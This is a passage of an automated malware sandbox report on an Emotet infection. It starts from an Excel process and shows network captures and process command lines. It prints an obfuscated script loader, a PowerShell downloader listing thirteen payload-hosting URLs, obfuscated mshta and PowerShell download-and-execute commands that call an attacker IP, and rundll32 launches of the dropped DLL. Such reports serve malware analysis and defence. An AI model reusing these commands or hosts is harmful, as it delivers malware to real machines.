                                    Data Raw: 32 62 32 37 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 27 20 63 6f 6e 74 65 6e 74 3d 27 45 6d 75 6c 61 74 65 49 45 39 27 3e 3c 73 63 72 69 70 74 3e 6c 31 6c 3d 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 4d 6f 64 65 7c 7c 64 6f 63 75 6d 65 6e 74 2e 61 6c 6c 3b 76 61 72 20 66 39 66 37 36 63 3d 74 72 75 65 3b 6c 6c 31 3d 64 6f 63 75 6d 65 6e 74 2e 6c 61 79 65 72 73 3b 6c 6c 6c 3d 77 69 6e 64 6f 77 2e 73 69 64 65 62 61 72 3b 66 39 66 37 36 63 3d 28 21 28 6c 31 6c 26 26 6c 6c 31 29 26 26 21 28 21 6c 31 6c 26 26 21 6c 6c 31 26 26 21 6c 6c 6c 29 29 3b 6c 5f 6c 6c 3d 6c 6f 63 61 74 69 6f 6e 2b 27 27 3b 6c 31 31 3d 6e 61 76 69 67 61 74 6f 72 2e 75 73 65 72 41 67 65 6e 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 49 31 28 6c 31 49 29 7b 72 65 74 75 72 6e 20 6c 31 31 2e 69 6e 64 65 78 4f 66 28 6c 31 49 29 3e 30 3f 74 72 75 65 3a 66 61 6c 73 65 7d 3b 6c 49 49 3d 6c 49 31 28 27 6b 68 74 27 29 7c 6c 49 31 28 27 70 65 72 27 29 3b 66 39 66 37 36 63 7c 3d 6c 49 49 3b 7a 4c 50 3d 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2b 27 30 46 44 27 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 6f 56 35 31 31 42 59 52 75 6f 32 69 68 3d 6e 65 77 20 41 72 72 61 79 28 29 3b 6f 56 35 31 31 42 59 52 75 6f 32 69 68 5b 30 5d 3d 27 67 25 37 38 25 36 39 25 36 45 5c 31 30 33 25 33 38 25 33 38 5c 31 31 37 27 20 20 20 3b 6a 50 36 34 35 45 38 4d 70 38 54 50 54 5b 30 5d 3d 27 7f 3c 7f 21 7f 44 7f 4f 7f 43 7f 54 7f 59 7f 50 7f 45 7f 20 7f 68 7f 74 7f 6d 7f 6c 7f 20 7f 50 7f 55 7f 42 7f 4c 7f 49 7f 43 7f 20 7f 22 7f 2d 7f 2f 7f 2f 7f 57 7f 33 7f 43 7e 18 7f 44 7f 54 7f 44 7f 20 7f 58 7f 48 7f 54 7f 4d 7f 4c 7f 20 7f 31 7f 2e 7f 30 7f 20 7f 54 7f 72 7f 61 7f 6e 7f 73 7f 69 7f 74 7f 69 7f 6f 7f 6e 7f 61 7f 6c 7e 18 7f 45 7f 4e 7f 22 7e 15 7e 5c 6e 7f 74 7f 70 7f 3a 7e 18 7f 77 7e 42 7f 2e 7f 77 7f 33 7f 2e 7f 6f 7f 72 7f 67 7f 2f 7f 54 7f 52 7f 2f 7f 78 7e 5c 6e 7e 0c 7f 31 7f 2f 7e 1e 7f 44 7e 4e 7e 50 7f 6c 7f 31 7f 2d 7f 74 7e 2d 7e 2f 7e 31 7e 33 7e 35 7f 6c 7f 2e 7f 64 7f 74 7f 64 7f 22 7f 3e 7f 3c 7e 57 7f 20 7f 78 7e 0c 7e 2f 7f 3d 7f 22 7e 3d 7e 3f 7e 41 7e 43 7e 45 7e 47 7e 49 7f 2f 7f 31 7f 39 7e 79 7e 56 7e 0b 7f 6c 7e 66 7e 68 7f 65 7f 61 7f 64 7e 67 7f 73 7f 63 7f 72 7f 69 7f 70 7f 74 7f 3e 7f 65 7f 76 7e 36 7f 28 7f 75 7f 6e 7f 65 7d 04 7f 61 7f 70 7f 65 7f 28 7f 5c 27 7f 25 7f 37 7f 36 7f 25 7f 36 7f 31 7f 5c 5c 7f 31 7f 36 7f 32 7f 25 7f 32 7f 30 7d 1e 7d 1c 7d 18 7f 39 7f 25 7f 33 7f 37 7d 29 7f 44 7d 22 7d 2b 7f 32 7d 2b 7f 33 7f 42 7f 71 7f 79 7d 29 7f 38 7d 2c 7f 25 7f 35 7f 33 7d 18 7f 34 7d 25 7f 32 7f 69 7f 6e 7f 67 7d 22 7f 45 7d 1e 7f 34 7f 36 7f 72 7f 6f 7f 6d 7f 43 7d 1b 7f 38 7f 61 7d 18 7f 32 7d 4b 7f 36 7f 46 7f 64 7f 65 7d 22 7d 37 7f 33 7f 31 7d 29 7d 3b 7d 50 7d 29 7d 59 7f 33 7f 30 7d 22 7d 28 7d 32 7f 66 7d 1b 7f 46 7f 72 7d 56 7d 1e 7f 35 7d 5e 7d 2d 7d 5f 7d 29 7f 42 7d 1b 7d 62 7d 4b 7f 33 7d 21 7f 33 7f 34 7d 29 7f 35 7d
                                    Data Ascii: 2b27<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';jP645E8Mp8TPT=new Array();oV511BYRuo2ih=new Array();oV511BYRuo2ih[0]='g%78%69%6E\103%38%38\117' ;jP645E8Mp8TPT[0]='<!DOCTYPE html PUBLIC "-//W3C~DTD XHTML 1.0 Transitional~EN"~~\ntp:~w~B.w3.org/TR/x~\n~1/~D~N~Pl1-t~-~/~1~3~5l.dtd"><~W x~~/="~=~?~A~C~E~G~I/19~y~V~l~f~head~gscript>ev~6(une}ape(\'%76%61\\162%20}}}9%37})D}"}+2}+3Bqy})8},%53}4}%2ing}"E}46romC}8a}2}K6Fde}"}731})};}P})}Y30}"}(}2f}Fr}V}5}^}-}_})B}}b}K3}!34})5}


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    1192.168.2.224916691.240.118.17280C:\Windows\System32\mshta.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 28, 2022 21:15:07.666040897 CET12OUTGET /ee/ss/se.png HTTP/1.1
                                    Host: 91.240.118.172
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:15:07.729461908 CET14INHTTP/1.1 200 OK
                                    Server: nginx/1.20.2
                                    Date: Fri, 28 Jan 2022 20:15:07 GMT
                                    Content-Type: image/png
                                    Content-Length: 1355
                                    Connection: keep-alive
                                    Last-Modified: Fri, 28 Jan 2022 09:57:38 GMT
                                    ETag: "54b-5d6a176fe2880"
                                    Accept-Ranges: bytes
                                    Data Raw: 24 70 61 74 68 20 3d 20 22 43 7b 4a 6f 6f 7d 3a 5c 7b 4a 6f 6f 7d 50 72 6f 67 7b 4a 6f 6f 7d 72 61 6d 44 7b 4a 6f 6f 7d 61 74 61 5c 4d 7b 4a 6f 6f 7d 69 6c 6f 73 73 64 2e 7b 4a 6f 6f 7d 64 6c 7b 4a 6f 6f 7d 6c 22 2e 72 65 70 6c 61 63 65 28 27 7b 4a 6f 6f 7d 27 2c 27 27 29 3b 0d 0a 24 75 72 6c 31 20 3d 20 27 68 74 74 70 3a 2f 2f 74 61 6d 69 6c 61 64 73 65 6e 73 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 42 45 41 44 76 71 47 67 65 6d 56 38 53 6e 54 58 2f 27 3b 0d 0a 24 75 72 6c 32 20 3d 20 27 68 74 74 70 3a 2f 2f 6d 61 6e 63 68 65 73 74 65 72 68 65 61 74 69 6e 67 73 65 72 76 69 63 65 73 2e 79 6f 75 70 72 6f 63 6f 6e 74 61 63 74 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 41 69 4b 31 39 75 4d 66 2f 27 3b 0d 0a 24 75 72 6c 33 20 3d 20 27 68 74 74 70 3a 2f 2f 74 75 6e 62 72 69 64 67 65 73 65 72 76 69 63 65 73 2e 63 6f 6d 2f 6a 66 6f 65 71 68 78 7a 2f 7a 4f 58 30 2f 27 3b 0d 0a 24 75 72 6c 34 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 79 70 75 72 65 61 6c 73 79 73 74 65 6d 2e 63 6f 6d 2f 41 70 70 5f 53 74 61 72 74 2f 52 68 68 38 6c 4b 4f 2f 27 3b 0d 0a 24 75 72 6c 35 20 3d 20 27 68 74 74 70 3a 2f 2f 69 6d 61 67 69 6e 61 72 69 75 6d 73 74 6f 72 65 2e 66 75 6e 2f 6e 63 73 62 2f 63 79 47 6f 54 59 71 4d 6d 63 52 77 76 71 64 72 65 2f 27 3b 0d 0a 24 75 72 6c 36 20 3d 20 27 68 74 74 70 3a 2f 2f 65 6e 67 61 7a 2e 73 68 6f 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 4d 4f 6c 6c 71 55 6d 32 6e 62 2f 27 3b 0d 0a 24 75 72 6c 37 20 3d 20 27 68 74 74 70 73 3a 2f 2f 65 63 6f 62 61 62 79 2e 70 69 2d 64 68 2e 63 6f 6d 2f 53 65 72 65 6e 64 69 62 2f 67 6c 31 68 63 65 66 39 59 33 47 53 54 43 44 43 2f 27 3b 0d 0a 24 75 72 6c 38 20 3d 20 27 68 74 74 70 3a 2f 2f 33 2d 66 61 73 65 6e 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 33 42 6c 30 68 42 62 57 2f 27 3b 0d 0a 24 75 72 6c 39 20 3d 20 27 68 74 74 70 73 3a 2f 2f 76 6e 2e 6d 69 6e 69 6e 6f 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 33 57 51 61 2f 27 3b 0d 0a 24 75 72 6c 31 30 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6c 61 73 74 72 65 67 61 72 69 73 74 6f 72 61 6e 74 65 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 66 66 64 43 37 45 6c 4d 32 42 6e 32 2f 27 3b 0d 0a 24 75 72 6c 31 31 20 3d 20 27 68 74 74 70 3a 2f 2f 6f 6e 65 78 6f 6e 65 2e 65 6c 65 6d 65 6e 74 6f 72 2e 63 6c 6f 75 64 2f 63 64 72 78 68 72 74 2f 75 56 45 30 75 56 48 4f 7a 35 45 2f 27 3b 0d 0a 24 75 72 6c 31 32 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6f 63 75 6c 75 73 76 69 73 69 6f 6e 63 61 72 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 5a 45 59 44 6a 6f 73 62 4e 45 78 46 54 64 75 2f 27 3b 0d 0a 24 75 72 6c 31 33 20 3d 20 27 68 74 74 70 3a 2f 2f 64 65 76 62 68 6f 6f 6d 69 67 61 75 73 68 61 6c 61 2e 6f 72 67 2f 47 65 74 61 65 2f 56 79 6f 35 72 72 4e 4c 41 67 64 30 51 78 58 76 6b 76 2f 27 3b 0d 0a 0d 0a 24 77 65 62 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 6e 65 74 2e 77 65 62 63 6c 69 65 6e 74 3b 0d 0a 24 75 72 6c 73 20 3d 20 22 24 75 72 6c 31 2c 24 75 72 6c 32 2c 24 75 72 6c 33 2c 24 75 72 6c 34 2c 24 75 72 6c 35 2c 24 75 72 6c 36 2c 24 75 72 6c 37 2c 24 75 72 6c 38 2c 24 75 72 6c 39 2c 24 75 72 6c 31 30 2c 24 75 72 6c 31 31 2c 24 75 72 6c 31 32 2c 24 75 72 6c 31 33 22 2e 73 70 6c 69 74 28 22 2c 22 29 3b 0d 0a 66 6f 72 65 61 63 68 20 28 24 75 72 6c 20 69 6e 20 24 75 72 6c 73 29 20 7b 0d 0a 20 20 20 74 72 79 20 7b 0d 0a 20 20 20 20 20
                                    Data Ascii: $path = "C{Joo}:\{Joo}Prog{Joo}ramD{Joo}ata\M{Joo}ilossd.{Joo}dl{Joo}l".replace('{Joo}','');$url1 = 'http://tamiladsense.com/wp-includes/BEADvqGgemV8SnTX/';$url2 = 'http://manchesterheatingservices.youprocontact.com/wp-admin/AiK19uMf/';$url3 = 'http://tunbridgeservices.com/jfoeqhxz/zOX0/';$url4 = 'https://mypurealsystem.com/App_Start/Rhh8lKO/';$url5 = 'http://imaginariumstore.fun/ncsb/cyGoTYqMmcRwvqdre/';$url6 = 'http://engaz.shop/wp-content/MOllqUm2nb/';$url7 = 'https://ecobaby.pi-dh.com/Serendib/gl1hcef9Y3GSTCDC/';$url8 = 'http://3-fasen.com/wp-content/3Bl0hBbW/';$url9 = 'https://vn.minino.com/wp-admin/c3WQa/';$url10 = 'https://lastregaristorante.com/wp-admin/ffdC7ElM2Bn2/';$url11 = 'http://onexone.elementor.cloud/cdrxhrt/uVE0uVHOz5E/';$url12 = 'https://oculusvisioncare.com/wp-includes/ZEYDjosbNExFTdu/';$url13 = 'http://devbhoomigaushala.org/Getae/Vyo5rrNLAgd0QxXvkv/';$web = New-Object net.webclient;$urls = "$url1,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$url11,$url12,$url13".split(",");foreach ($url in $urls) { try {


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    2192.168.2.2249167136.0.111.1580C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    TimestampkBytes transferredDirectionData
                                    Jan 28, 2022 21:15:07.946124077 CET15OUTGET /wp-includes/BEADvqGgemV8SnTX/ HTTP/1.1
                                    Host: tamiladsense.com
                                    Connection: Keep-Alive
                                    Jan 28, 2022 21:15:08.091576099 CET16INHTTP/1.1 200 OK
                                    Connection: Keep-Alive
                                    Set-Cookie: 61f44ecc07555=1643400908; expires=Fri, 28-Jan-2022 20:16:08 GMT; Max-Age=60; path=/
                                    Cache-Control: no-cache, must-revalidate
                                    Pragma: no-cache
                                    Last-Modified: Fri, 28 Jan 2022 20:15:08 GMT
                                    Expires: Fri, 28 Jan 2022 20:15:08 GMT
                                    Content-Type: application/x-msdownload
                                    Content-Disposition: attachment; filename="XrEtCt.dll"
                                    Content-Transfer-Encoding: binary
                                    Content-Length: 557056
                                    Date: Fri, 28 Jan 2022 20:15:08 GMT
                                    Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 68 73 c2 61 2c 12 ac 32 2c 12 ac 32 2c 12 ac 32 ef 1d f3 32 26 12 ac 32 ef 1d f1 32 37 12 ac 32 2c 12 ad 32 0e 10 ac 32 0b d4 d1 32 36 12 ac 32 0b d4 c1 32 a6 12 ac 32 0b d4 c2 32 b2 12 ac 32 0b d4 d6 32 2d 12 ac 32 0b d4 d0 32 2d 12 ac 32 0b d4 d4 32 2d 12 ac 32 52 69 63 68 2c 12 ac 32 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 91 fa f3 61 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 08 00 00 50 04 00 00 20 04 00 00 00 00 00 06 0d 03 00 00 10 00 00 00 60 04 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 10 00 00 5d f5 08 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 40 2d 05 00 52 00 00 00 34 10 05 00 04 01 00 00 00 a0 05 00 50 76 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 08 00 30 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 bd 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 60 04 00 94 05 00 00 ac 0f 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 39 45 04 00 00 10 00 00 00 50 04 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 92 cd 00 00 00 60 04 00 00 d0 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 80 65 00 00 00 30 05 00 00 30 00 00 00 30 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 76 02 00 00 a0 05 00 00 80 02 00 00 60 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 76 93 00 00 00 20 08 00 00 a0 00 00 00 e0 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                    Data Ascii: MZ@!L!This program cannot be run in DOS mode.$hsa,2,2,22&2272,2226222222-22-22-2Rich,2PELa!P `]@-R4Pv 0N@`@.text9EP `.rdata``@@.datae000@.rsrcPv`@@.relocv @B


                                    Statistics

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:21:14:15
                                    Start date:28/01/2022
                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                    Imagebase:0x13f560000
                                    File size:28253536 bytes
                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:2
                                    Start time:21:14:16
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd /c set ooo=mshta http://91.240.118.172/ee/ss/se.html & echo %ooo% | cmd
                                    Imagebase:0x4a030000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:4
                                    Start time:21:14:17
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /S /D /c" echo %ooo% "
                                    Imagebase:0x4a030000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:5
                                    Start time:21:14:17
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:cmd
                                    Imagebase:0x4a030000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:6
                                    Start time:21:14:18
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\mshta.exe
                                    Wow64 process (32bit):false
                                    Commandline:mshta http://91.240.118.172/ee/ss/se.html
                                    Imagebase:0x13fd10000
                                    File size:13824 bytes
                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:8
                                    Start time:21:14:20
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FutuReD}{FutuReD}Ne{FutuReD}{FutuReD}w{FutuReD}-Obj{FutuReD}ec{FutuReD}{FutuReD}t N{FutuReD}{FutuReD}et{FutuReD}.W{FutuReD}{FutuReD}e'.replace('{FutuReD}', ''); $c4='bC{FutuReD}li{FutuReD}{FutuReD}en{FutuReD}{FutuReD}t).D{FutuReD}{FutuReD}ow{FutuReD}{FutuReD}nl{FutuReD}{FutuReD}{FutuReD}o'.replace('{FutuReD}', ''); $c3='ad{FutuReD}{FutuReD}St{FutuReD}rin{FutuReD}{FutuReD}g{FutuReD}(''ht{FutuReD}tp{FutuReD}://91.240.118.172/ee/ss/se.png'')'.replace('{FutuReD}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
                                    Imagebase:0x13f180000
                                    File size:473600 bytes
                                    MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:.Net C# or VB.NET
                                    Reputation:high

                                    General

                                    Target ID:10
                                    Start time:21:14:29
                                    Start date:28/01/2022
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                    Imagebase:0x4a3f0000
                                    File size:345088 bytes
                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high

                                    General

                                    Target ID:11
                                    Start time:21:14:30
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWow64\rundll32.exe C:\ProgramData\Milossd.dll KitKat
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443285949.00000000002B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443244837.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000B.00000002.443390537.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:12
                                    Start time:21:14:35
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\Milossd.dll",DllRegisterServer
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510464737.0000000002CF1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510287777.00000000026A1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510076235.0000000000810000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510039469.0000000000731000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510322311.0000000002730000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510432409.0000000002830000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510167906.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510522270.0000000002E41000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510145612.00000000008B1000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.509996233.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510607759.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510494175.0000000002DB0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510409215.0000000002801000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510379453.00000000027D0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510352151.0000000002761000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510556451.0000000002E91000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000C.00000002.510119980.0000000000880000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:13
                                    Start time:21:15:00
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",RIBFxhGufP
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516180172.0000000000601000.00000020.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.515850446.00000000003C0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.516839554.0000000010001000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                    Reputation:high

                                    General

                                    Target ID:14
                                    Start time:21:15:07
                                    Start date:28/01/2022
                                    Path:C:\Windows\SysWOW64\rundll32.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Hzcvqvi\kisyfwhhvxv.tpx",DllRegisterServer
                                    Imagebase:0xec0000
                                    File size:44544 bytes
                                    MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
